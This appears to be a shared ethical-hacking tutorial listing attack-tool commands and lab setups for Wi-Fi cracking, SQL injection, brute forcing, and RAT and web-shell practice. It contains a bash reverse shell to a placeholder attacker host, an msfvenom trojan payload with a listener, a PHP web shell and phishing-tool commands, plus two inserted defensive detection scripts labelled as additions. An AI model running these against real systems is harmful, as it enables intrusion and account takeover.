Hacking Practical Guide

This document is a comprehensive guide for practical ethical hacking, detailing installation and usage of essential hacking tools along with ready-made lab setups for hands-on practice. It includes instructions for tools like Nmap, Metasploit, SQLmap, and others, covering various hacking techniques such as network scanning, password cracking, and web application exploitation. The guide emphasizes legal use in controlled environments and provides specific lab setups for Wi-Fi hacking, web application testing, remote access trojans, forensics, and password cracking.

Uploaded by yohel52580

Complete Practical Ethical Hacking Guide (Expanded with Labs)

This document is a **complete hacking lab and tools manual**. It contains:

1. Step-by-step installation & usage of the most important hacking tools.
2. Practical commands for each tool.
3. Ready-made LAB setups (Wi-Fi, Web Apps, RATs, Forensics, etc.) for hands-on practice.

DISCLAIMER: Use only in legal test labs (HackTheBox, TryHackMe, DVWA, Metasploitable, local Wi-Fi lab, etc.).

Tool 1: Nmap (Network Mapper)


Nmap is used for network discovery, scanning, and vulnerability detection.
# Basic scan
nmap 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Version detection
nmap -sV 192.168.1.1
# Aggressive scan
nmap -A 192.168.1.1

Tool 2: Netcat (nc)


Netcat is the Swiss army knife of networking: scanning, transfers, shells.
# Port scanning
nc -zv 192.168.1.1 20-1000
# Banner grabbing
nc 192.168.1.1 80
# Reverse shell
bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1

Tool 3: Metasploit Framework


Metasploit is a powerful exploitation framework.
# Start metasploit
msfconsole
# Search for exploits
search vsftpd
# Use exploit
use exploit/unix/ftp/vsftpd_234_backdoor
# Set target
set RHOST 192.168.1.10
# Set payload
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Run exploit
exploit

Tool 4: SQLmap
Automated SQL injection tool.
# Basic SQL injection test
sqlmap -u "http://target.com/page.php?id=1"
# Dump database
sqlmap -u "http://target.com/page.php?id=1" --dump
# Get OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell

Tool 5: Hydra
Fast brute force password cracking tool for many protocols.
# SSH brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
# FTP brute force
hydra -V -f -l admin -P passwords.txt ftp://192.168.1.5

Tool 6: Aircrack-ng
Wireless network cracking suite.
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Crack WPA/WPA2
aircrack-ng -w wordlist.txt capture.cap

Tool 7: Wifite
Automated Wi-Fi hacking tool.
# Run automated attacks
wifite
# Target a specific network
wifite -i wlan0mon --essid <SSID>

Tool 8: Wireshark
GUI packet sniffer and analyzer.
# Start capture on eth0 (-k begins capturing immediately)
wireshark -i eth0 -k
# Capture on wlan0 with a display filter
wireshark -i wlan0 -k -Y "http"

Tool 9: Burp Suite


Web application security testing tool.
# Start Burp
burpsuite
# Configure proxy in browser (127.0.0.1:8080)
# Intercept traffic, scan for vulnerabilities

Tool 10: Hashcat
Advanced password cracking tool.
# Crack MD5 hash
hashcat -m 0 hash.txt wordlist.txt
# Crack SHA256 hash
hashcat -m 1400 hash.txt wordlist.txt

Tool 11: John the Ripper


Password cracker.
# Crack passwords
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Show cracked passwords
john --show hash.txt

Tool 12: Remote Access Trojans (RATs)


Used for remote control of systems (educational use in labs).
# Example with Metasploit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe > rat.exe

Tool 13: Web Shells


Malicious scripts uploaded to web servers for remote access.
# Example PHP web shell (educational)
<?php system($_GET['cmd']); ?>
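
A defender-side check for the one-line shell above, as an added example that is not part of the original guide: it flags PHP files that pass request parameters straight into a command-execution function. The names `scan_webshells`, `make_sample_webroot` and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the guide): find PHP files that hand request
# parameters directly to a command-execution function.

# Heuristic pattern: a dangerous call whose argument list contains a
# request superglobal, e.g. system($_GET['cmd']).
WEBSHELL_RE='(^|[^[:alnum:]_])(system|exec|shell_exec|passthru|popen|proc_open|eval)[[:space:]]*\([^)]*\$_(GET|POST|REQUEST|COOKIE)'

# scan_webshells DIR -> prints one suspicious file path per line, sorted.
scan_webshells() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' \) \
        -exec grep -lE "$WEBSHELL_RE" {} + | sort
}

# make_sample_webroot -> builds a constructed web root and prints its path.
# Two files have the web-shell shape, two are benign look-alikes.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/uploads"
    cat > "$root/uploads/avatar.php" <<'EOF'
<?php system($_GET['cmd']); ?>
EOF
    cat > "$root/uploads/thumb.phtml" <<'EOF'
<?php @eval($_POST["x"]); ?>
EOF
    cat > "$root/search.php" <<'EOF'
<?php echo htmlspecialchars($_GET['q']); ?>
EOF
    cat > "$root/status.php" <<'EOF'
<?php system('uptime'); ?>
EOF
    printf '%s\n' "$root"
}

sample=$(make_sample_webroot)
scan_webshells "$sample"      # lists only the two files under uploads/
rm -rf "$sample"
```

Pattern matching like this misses encoded or obfuscated shells, so pair it with file-integrity monitoring and with disabling PHP execution in upload directories.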

Tool 14: Medusa


Brute-force password cracker similar to Hydra.
# SSH brute force
medusa -h 192.168.1.10 -u root -P wordlist.txt -M ssh

Tool 15: Autopsy


Digital forensics platform.
# Start Autopsy web interface
autopsy

Tool 16: King Phisher


Phishing campaign tool.
# Start King Phisher server
king-phisher

Tool 17: Wifiphisher
Automated phishing attacks against Wi-Fi clients.
# Start phishing attack
wifiphisher -i wlan0 -p firmware-upgrade

Tool 18: OpenSSL


Toolkit for SSL/TLS and encryption.
# Generate RSA private key
openssl genrsa -out key.pem 2048
# Generate CSR
openssl req -new -key key.pem -out req.csr
# Encrypt file (-pbkdf2 derives the key with PBKDF2 instead of the weak legacy default)
openssl enc -aes-256-cbc -pbkdf2 -in secret.txt -out secret.enc

Tool 19: Immunity Canvas


Commercial exploitation framework, similar to Metasploit.
# Start CANVAS
python canvas.py

Hacking Lab Setups

**Wi-Fi Hacking Lab Setup**
Tools: Aircrack-ng, Wifite, Wifiphisher

1. Use a laptop/phone with Wi-Fi adapter supporting monitor mode.
2. Boot Kali Linux or Termux with external Wi-Fi adapter.
3. Start monitor mode: airmon-ng start wlan0
4. Capture traffic: airodump-ng wlan0mon
5. Launch attacks with `aircrack-ng` or `wifite`.
6. Simulate phishing with `wifiphisher`.

Practice Goal: Learn WPA2 handshake capture & dictionary cracking.

**Web Application Hacking Lab**
Tools: Burp Suite, SQLmap, Metasploit, Web Shells

1. Install DVWA (Damn Vulnerable Web App) on local Apache/PHP/MySQL.
2. Or use **bWAPP, Mutillidae, Juice Shop** from Docker.
3. Run SQLmap against vulnerable parameters: sqlmap -u "http://127.0.0.1/dvwa/vuln.php?id=1" --dump
4. Use Burp Suite as a proxy to intercept requests.
5. Upload a simple web shell (PHP) to gain server control.

Practice Goal: Identify and exploit SQLi, XSS, file upload vulnerabilities.

**Remote Access Trojan (RAT) Lab**
Tools: Metasploit, msfvenom

1. Generate payload with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rat.exe
2. Start Metasploit listener:
   use exploit/multi/handler
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 127.0.0.1
   set LPORT 4444
   exploit
3. Execute rat.exe inside Windows VM (Metasploitable/Win7 VM).
4. Gain reverse shell connection.

Practice Goal: Understand RAT behavior in safe sandbox.

**Forensics & Incident Response Lab**
Tools: Autopsy, Wireshark, Volatility

1. Capture packets from your own network using Wireshark.
2. Analyze PCAP files for credentials, logins, HTTP traffic.
3. Mount disk images (dd files) into Autopsy.
4. Recover deleted files, analyze browser history, extract evidence.
5. Use Volatility for memory dumps.

Practice Goal: Learn evidence recovery & network analysis.

**Password Cracking Lab**
Tools: Hashcat, John the Ripper, Hydra, Medusa

1. Collect hashes from `/etc/shadow`, database dumps, or challenge files.
2. Crack MD5 with Hashcat: hashcat -m 0 hash.txt wordlist.txt
3. Crack SHA256 with John: john --wordlist=rockyou.txt hash.txt
4. Test Hydra against test SSH service: hydra -l root -P rockyou.txt ssh://127.0.0.1

Practice Goal: Understand wordlist attacks, brute-force, hybrid attacks.
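
The detection counterpart to the Hydra and Medusa SSH runs (Tool 5, Tool 14 and step 4 of this lab), as an added example that is not part of the original guide: it counts failed sshd password attempts per source and marks sources that logged in afterwards. The function names and the log lines are constructed; the line format assumed is OpenSSH's standard syslog output.

```shell
#!/bin/sh
# Added example (not from the guide): spot SSH password guessing in sshd
# logs and flag sources that logged in successfully afterwards.

# detect_ssh_bruteforce MIN < auth.log
# Prints "ip failures verdict" for each source with >= MIN failed password
# attempts. Verdict is SUCCESS_AFTER_FAILURES when an accepted login from
# the same source follows at least MIN failures, else FAILURES_ONLY.
detect_ssh_bruteforce() {
    awk -v min="$1" '
    function src(   i) {   # source IP: the token between "from" and "port"
        for (i = NF - 2; i > 1; i--)
            if ($i == "from" && $(i + 2) == "port") return $(i + 1)
        return ""
    }
    /sshd\[[0-9]+\]: Failed password for / {
        ip = src(); if (ip != "") fails[ip]++
    }
    /sshd\[[0-9]+\]: Accepted [a-z-]+ for / {
        ip = src(); if (ip != "" && fails[ip] >= min) hit[ip] = 1
    }
    END {
        for (ip in fails)
            if (fails[ip] >= min)
                print ip, fails[ip], ((ip in hit) ? "SUCCESS_AFTER_FAILURES" : "FAILURES_ONLY")
    }' | sort
}

# Constructed sample: one guessing run that ends in a login, one that
# does not, and one ordinary user who mistyped a password once.
sample_auth_log() {
    cat <<'EOF'
Mar 10 09:15:01 lab sshd[2101]: Failed password for root from 192.168.1.50 port 40110 ssh2
Mar 10 09:15:02 lab sshd[2103]: Failed password for root from 192.168.1.50 port 40112 ssh2
Mar 10 09:15:03 lab sshd[2105]: Failed password for root from 192.168.1.50 port 40114 ssh2
Mar 10 09:15:04 lab sshd[2107]: Accepted password for root from 192.168.1.50 port 40116 ssh2
Mar 10 09:20:11 lab sshd[2150]: Failed password for invalid user admin from 192.168.1.77 port 51200 ssh2
Mar 10 09:20:12 lab sshd[2152]: Failed password for invalid user test from 192.168.1.77 port 51202 ssh2
Mar 10 09:20:13 lab sshd[2154]: Failed password for invalid user oracle from 192.168.1.77 port 51204 ssh2
Mar 10 09:31:40 lab sshd[2201]: Failed password for alice from 192.168.1.20 port 60022 ssh2
Mar 10 09:31:52 lab sshd[2203]: Accepted password for alice from 192.168.1.20 port 60024 ssh2
EOF
}

sample_auth_log | detect_ssh_bruteforce 3
```

On a real host, feed it `/var/log/auth.log` or the journal's sshd entries. A SUCCESS_AFTER_FAILURES row means a guessed password worked, so rotate that credential and move the service to key-only authentication.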
